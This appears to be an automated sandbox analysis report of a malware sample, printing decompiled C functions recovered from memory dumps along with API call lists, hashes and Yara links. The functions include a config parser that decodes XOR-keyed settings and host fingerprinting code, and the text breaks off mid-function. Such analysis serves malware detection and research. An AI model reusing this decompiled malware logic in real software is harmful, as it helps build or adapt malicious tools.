0x01188d71
0x01188d75
0x01188e06
0x01188e06
0x01188d7b
0x01188d7b
0x01188d80
0x01188d80
0x01188d87
0x01188d93
0x01188d95
0x01188d97
0x01188d99
0x01188da0
0x01188dab
0x01188db2
0x01188db4
0x01188dbb
0x01188dbd
0x01188dc4
0x01188dcf
0x01188dcf
0x01188dbb
0x01188dd4
0x01188dd9
0x01188de0
0x01188dfe
0x01188e00
0x01188e00
0x01188d97
0x01188e12
0x01188e12
0x01188e14
0x01188e19
0x01188e1b
0x01188e1b
0x01188e26

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05A39368,00000000,?,74B5F710,00000000,74B5F730), ref: 01188D63
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05A393A0,?,00000000,30314549,00000014,004F0053,05A3935C), ref: 01188E00
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0118523E), ref: 01188E12

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7e27645cd2702c1405afaaa42202a49e62ea30c53137653aff9046bef979e234
Instruction ID: 0e8c9ec6e6b3fe30b5def05e3a38c97cd4e17d7d157d938471e1e85be7a9d3f1
Opcode Fuzzy Hash: 7e27645cd2702c1405afaaa42202a49e62ea30c53137653aff9046bef979e234
Instruction Fuzzy Hash: 6931A631900219BFEF29EFD4EC88E9E7BBEEB44718F548165B510970A0D7709A48CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0118A376, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0118A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x118d340; // 0x5a39a88
				_push(0x800);
				_push(0);
				_push( *0x118d238);
				if( *0x118d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x118d24c =  *0x118d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E01187306(_t44, _t40);
						_t18 = E01184A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x118d24c < 5) {
								 *0x118d24c =  *0x118d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E01186761();
						HeapFree( *0x118d238, 0, _t40);
						goto L10;
					}
					_t24 = E01181F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E01184AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x0118a376
0x0118a376
0x0118a379
0x0118a37a
0x0118a384
0x0118a38b
0x0118a390
0x0118a392
0x0118a398
0x0118a3c0
0x0118a3d8
0x0118a3da
0x0118a3db
0x0118a3dd
0x0118a41b
0x0118a41b
0x0118a421
0x0118a427
0x0118a427
0x0118a3df
0x0118a3e5
0x0118a3e8
0x0118a3f7
0x0118a3f9
0x0118a400
0x0118a434
0x0118a439
0x0118a43b
0x0118a43d
0x0118a43d
0x00000000
0x0118a43b
0x0118a402
0x0118a407
0x0118a415
0x00000000
0x0118a415
0x0118a3cf
0x0118a3d4
0x0118a3d4
0x00000000
0x0118a3d4
0x0118a3a2
0x00000000
0x00000000
0x0118a3b1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0118A39A

Part of subcall function 01184AB6: GetTickCount.KERNEL32 ref: 01184ACA
Part of subcall function 01184AB6: wsprintfA.USER32 ref: 01184B1A
Part of subcall function 01184AB6: wsprintfA.USER32 ref: 01184B37
Part of subcall function 01184AB6: wsprintfA.USER32 ref: 01184B63
Part of subcall function 01184AB6: HeapFree.KERNEL32(00000000,?), ref: 01184B75
Part of subcall function 01184AB6: wsprintfA.USER32 ref: 01184B96
Part of subcall function 01184AB6: HeapFree.KERNEL32(00000000,?), ref: 01184BA6
Part of subcall function 01184AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01184BD4
Part of subcall function 01184AB6: GetTickCount.KERNEL32 ref: 01184BE5

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0118A3B8
HeapFree.KERNEL32(00000000,00000002,01185289,?,01185289,00000002,?,?,01185D5E,?), ref: 0118A415

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 9bcb4c93e0054dd014f748a44569f3cba9e5ea33cfc2cc6438a6dc8a7e24663d
Instruction ID: dace7726ad74f734b91201cf5adae0ccbc7aca463c44f87be0c0ee1844174a7b
Opcode Fuzzy Hash: 9bcb4c93e0054dd014f748a44569f3cba9e5ea33cfc2cc6438a6dc8a7e24663d
Instruction Fuzzy Hash: 34213D75200205EBDB29AF98E884F9E37ADEF45254F14C026F9029B180DBB0E9859FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0118219B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0118219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E01183AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x118d2a8; // 0x48aa5a8
						_t20 = _t68 + 0x118e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E011857B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x011821a1
0x011821a4
0x011821b4
0x011821bd
0x011821c1
0x0118228f
0x01182295
0x01182295
0x011821db
0x011821e0
0x011821e4
0x011821ea
0x011821ef
0x011821f6
0x01182205
0x01182205
0x01182209
0x0118220b
0x01182217
0x01182222
0x0118222d
0x01182231
0x0118223b
0x0118223f
0x01182241
0x01182246
0x0118224d
0x0118225d
0x0118225d
0x01182246
0x0118223f
0x0118225f
0x01182264
0x01182269
0x01182269
0x0118226c
0x01182275
0x0118227a
0x0118227a
0x0118227f
0x01182284
0x01182284
0x0118227f
0x01182209
0x01182286
0x0118228c
0x00000000

APIs

Part of subcall function 01183AB0: SysAllocString.OLEAUT32(80000002), ref: 01183B0D
Part of subcall function 01183AB0: SysFreeString.OLEAUT32(00000000), ref: 01183B73

SysFreeString.OLEAUT32(?), ref: 0118227A
SysFreeString.OLEAUT32(011885ED), ref: 01182284

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: fb5adf1dea3d0f0689b15d60e4e3828d68dfe520b168500e94ad7df6216e592e
Instruction ID: f2fb1224614715ee1dce8aa5643831cf1a67bc7130e07ffb08dd344ca4f2ded6
Opcode Fuzzy Hash: fb5adf1dea3d0f0689b15d60e4e3828d68dfe520b168500e94ad7df6216e592e
Instruction Fuzzy Hash: 69316D71500119AFCB26EF98C888C9BBB7AFFC97447148658F9159B210D371DD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01188E27, Relevance: 3.0, APIs: 2, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01188E27(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E01189070(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E011872C0(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E011822F1(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x118d238, 0, _t25);
				}
				return _t22;
			}

0x01188e27
0x01188e38
0x01188e3c
0x01188e97
0x01188e3e
0x01188e45
0x01188e4d
0x01188e50
0x01188e55
0x01188e59
0x01188e5f
0x01188e67
0x01188e6a
0x01188e82
0x01188e82
0x01188e8d
0x01188e8d
0x01188e9e

APIs

Part of subcall function 01189070: lstrlen.KERNEL32(?,00000000,05A39A98,00000000,01188808,05A39C76,?,?,?,?,?,63699BC3,00000005,0118D00C), ref: 01189077
Part of subcall function 01189070: mbstowcs.NTDLL ref: 011890A0
Part of subcall function 01189070: memset.NTDLL ref: 011890B2

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,05A3935C), ref: 01188E5F
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,05A3935C), ref: 01188E8D

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 8218d756dd509b5f25eaa017e1b443f18599fa499cb0dac5bfc80338d10f8245
Instruction ID: 3e835fb525addeea5eb2b2e02e2ac3062647dfe8e6863165a4d1d7c175ce6616
Opcode Fuzzy Hash: 8218d756dd509b5f25eaa017e1b443f18599fa499cb0dac5bfc80338d10f8245
Instruction Fuzzy Hash: F601843621020ABBDB266F98DC44F9F7B79EF84754F508425FA009A1A0DB71D955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011858DB, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E011858DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E0118A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0118A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x011858e0
0x011858eb
0x011858ed
0x011858f3
0x011858f5
0x011858fa
0x01185903
0x01185907
0x01185910
0x01185914
0x01185923
0x01185916
0x01185917
0x0118591c
0x0118591c
0x01185914
0x01185907
0x0118592c

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,01181FA0,74B5F710,00000000,?,?,01181FA0), ref: 011858F3

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

GetComputerNameExA.KERNELBASE(00000003,00000000,01181FA0,01181FA1,?,?,01181FA0), ref: 01185910

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 1727f190d280bcf61d203def110d9557a9589c781d8b0763adf5b6625f12ef39
Instruction ID: 69ec7d496500140968aadbb5f4c90260c4ddb3f342f0e8322b01c4d134699116
Opcode Fuzzy Hash: 1727f190d280bcf61d203def110d9557a9589c781d8b0763adf5b6625f12ef39
Instruction Fuzzy Hash: EFF09036A00206AAEB15E6999C00EAF37BEDBC6690F21406AA511E3100EB70DA059A70

Uniqueness

Uniqueness Score: -1.00%

Function 01184ECA, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x118d23c) == 0) {
						E01181B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x118d23c) == 1) {
						_t10 = E011812E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x01184ed1
0x01184ed2
0x01184ed5
0x01184f07
0x01184f09
0x01184f09
0x01184ed7
0x01184ed8
0x01184eed
0x01184ef4
0x01184ef6
0x01184ef6
0x01184ef4
0x01184ed8
0x01184f11

APIs

InterlockedIncrement.KERNEL32(0118D23C), ref: 01184EDF

Part of subcall function 011812E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,01184EF2,?), ref: 011812F8

InterlockedDecrement.KERNEL32(0118D23C), ref: 01184EFF

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: fa72b0f2435905657ea4cf317994f6e8d85cf2aa79c860d96b89d7119a1693c5
Instruction ID: c85e58ce3e8547914f2faac07086a6db8e0030482b80f1d8af5d10d9b7491732
Opcode Fuzzy Hash: fa72b0f2435905657ea4cf317994f6e8d85cf2aa79c860d96b89d7119a1693c5
Instruction Fuzzy Hash: 10E04F2624823767E63E3ABCA90CB5EBA53AB81A94F11C42CE581D1454DF14C4429EA7

Uniqueness

Uniqueness Score: -1.00%

Function 011848F1, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E011848F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x118d2a8; // 0x48aa5a8
				_t4 = _t15 + 0x118e39c; // 0x5a38944
				_t20 = _t4;
				_t6 = _t15 + 0x118e124; // 0x650047
				_t17 = E0118219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E01182298(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x011848fb
0x01184902
0x01184903
0x01184904
0x01184905
0x0118490b
0x01184910
0x01184910
0x0118491a
0x0118492c
0x01184933
0x01184961
0x01184935
0x01184937
0x0118493c
0x0118495e
0x0118493e
0x01184941
0x01184948
0x0118494d
0x0118494f
0x0118494f
0x01184954
0x01184954
0x0118493c
0x01184968

APIs

Part of subcall function 0118219B: SysFreeString.OLEAUT32(?), ref: 0118227A

Part of subcall function 01182298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,011884CA,004F0053,00000000,?), ref: 011822A1
Part of subcall function 01182298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,011884CA,004F0053,00000000,?), ref: 011822CB
Part of subcall function 01182298: memset.NTDLL ref: 011822DF

SysFreeString.OLEAUT32(00000000), ref: 01184954

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 41e2e645406b2adc670b0b6e83944adf03627ca632782ff76641799992b4029a
Instruction ID: 1f2443535e47cf6b34e38d6ab41fa9fb820674a5a672dfdc6bdef4d08d68e097
Opcode Fuzzy Hash: 41e2e645406b2adc670b0b6e83944adf03627ca632782ff76641799992b4029a
Instruction Fuzzy Hash: C301753190011ABFDB29AFA8CC44E9EBBB9EB48654F018125FA14E7060E770D915CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DCBB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E1D6C97,?), ref: 6E1DCBC6

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction ID: 820333205368eae30f854d8f122d52634dc1706d08cd2fea688c312134bb87b7
Opcode Fuzzy Hash: 0146fa14ff3f797d5c028fedf0acdfbd1472a0530ed25cc1d055a370468e6c6b
Instruction Fuzzy Hash: E5D05EB2AA47495EDF005EB6A80DB623BECF3857A5F108835B91DC6144E675C941DA10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAC71, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6E1DAC73

Part of subcall function 6E1DABFF: RtlEncodePointer.NTDLL(00000000,?,6E1DAC78,00000000,6E1E5A67,6E29A270,00000000,00000314,?,6E1DD0DA,6E29A270,6E1FE438,00012010), ref: 6E1DAC66

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: c0ec3df7dfb2676b3eabd7b2e1e64625d98d1eb03a23cc5d0fa29abd07860359
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01185356, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01185356(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E01188BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x118d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E011848F1(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x01185356
0x0118535e
0x01185375
0x01185390
0x01185394
0x01185399
0x0118539b
0x011853ad
0x011853b9
0x0118539d
0x0118539d
0x011853a2
0x011853a7
0x011853a7
0x0118539b
0x011853bf
0x011853c3
0x011853c3
0x0118536a
0x0118536f
0x01185373
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 011848F1: SysFreeString.OLEAUT32(00000000), ref: 01184954

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,01188D51,?,004F0053,05A39368,00000000,?), ref: 011853B9

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 3a09fe9d8dfa4f3f96f9dd7b7f9775cc39af9c3002df387412d4ac1721ac0c31
Instruction ID: c02ff7616ddad262532bbb4af839e69eafda50fe59303000671a258d21327b3d
Opcode Fuzzy Hash: 3a09fe9d8dfa4f3f96f9dd7b7f9775cc39af9c3002df387412d4ac1721ac0c31
Instruction Fuzzy Hash: 71014B3250161ABBDB2AAF98CC01FEE7F66EF44790F04C028FE059A120D771C960DB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0118888E, Relevance: 10.7, APIs: 7, Instructions: 237
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0118888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x118d2a4; // 0x63699bc3
				if(E01187145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x118d2d8 = _v8;
				}
				_t31 =  *0x118d2a4; // 0x63699bc3
				if(E01187145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x118d2a4; // 0x63699bc3
				if(E01187145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x118d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x118d2a4; // 0x63699bc3
						_t43 = E01186B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x118d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x118d2a4; // 0x63699bc3
						_t44 = E01186B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x118d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x118d2a4; // 0x63699bc3
						_t45 = E01186B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x118d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x118d2a4; // 0x63699bc3
						_t46 = E01186B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x118d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x118d2a4; // 0x63699bc3
						_t47 = E01186B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x118d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x118d2a4; // 0x63699bc3
						_t48 = E01186B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E011856FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E01186702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x118d2a4; // 0x63699bc3
						_t49 = E01186B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E011856FA(0, _t49) != 0) {
						_t114 =  *0x118d32c; // 0x5a395b0
						E011823F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x118d2a4; // 0x63699bc3
						_t50 = E01186B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x118d2a8; // 0x48aa5a8
						_t20 = _t51 + 0x118e252; // 0x616d692f
						 *0x118d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E011856FA(0, _t50);
						 *0x118d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x118d2a4; // 0x63699bc3
								_t53 = E01186B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x118d2a8; // 0x48aa5a8
								_t21 = _t54 + 0x118e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E011856FA(0, _t53);
							}
							 *0x118d340 = _t55;
							HeapFree( *0x118d238, 0, _t97);
							_v12 = 0;
